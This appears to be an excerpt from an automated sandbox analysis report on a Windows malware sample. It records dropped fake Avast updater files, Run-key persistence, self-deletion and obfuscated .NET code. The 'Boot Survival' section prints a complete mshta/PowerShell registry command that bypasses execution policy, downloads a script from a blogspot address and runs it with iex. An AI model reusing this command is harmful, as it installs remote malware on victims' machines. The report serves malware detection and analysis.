                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_02772CB9 push ecx; ret 20_3_02772CD9
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_02771179 push FFFFFF82h; iretd 20_3_0277117B
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_02774579 push edx; retf 20_3_0277457C
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_0277296C push edi; ret 20_3_02772978
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, A9CvUGp4kU1V2hHRFHn.csHigh entropy of concatenated method names: 'OX7e2Hy5Pt', 'dWKevvZJWu', 'rs4eoMXh0k', 'C7heyHoNeq', 'VmMegQgJFI', 'sPJeTlCyGc', 'gveeEdLYki', 'TmWWCaItRt', 'JXxeXmkKa9', 'cJwe5uCKXW'
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, B.csHigh entropy of concatenated method names: 'Main', 'w0wVCfytf', 'KimKarden', 'eVExnSBWA', 'H7e8o26fl', 'HiPnANG73', 'agI9UShdl', 'lskkZTUSN', 'jtX7KDGmL', 'hCmRr5SQP'
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.csHigh entropy of concatenated method names: 'OHhxno9LMv59JwkpBPX', 'G66a6A9UBrBVeZ9yO97', 'Qn5CJCt4Zo', 'vh0ry9Sq2v', 'NAgCzWe3ZP', 'pY9pAMnRJn', 't34paM2Ne2', 'xvopCy1n4p', 'FjhRFseRF0', 'AWLahn4oRf'
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeFile created: C:\Users\user\AppData\Roaming\Avlogo\goopdate.dllJump to dropped file
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeFile created: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F4222 GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileIntW,52_2_6B8F4222

                      Boot Survival

                      barindex
                      Creates an autostart registry key pointing to binary in C:\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala77Jump to behavior
                      Creates autostart registry keys with suspicious values (likely registry only malware)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala77 mshta "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], jve = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], loo = new ActiveXObject(fll[0]); loo[fll[1]](fll[2], fll[3], fll[4], fll[5], fll[6]);close(); new ActiveXObject(jve[0])[jve[1]](WScript[jve[2]]);"Jump to behavior
                      Creates multiple autostart registry keys
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala77Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakekala157Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9F8366 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,52_2_6B9F8366
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala77Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala77Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakekala157Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakekala157Jump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Deletes itself after installation
                      Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\0a0#u00a0.jsJump to behavior
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\avlogo CfgData
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
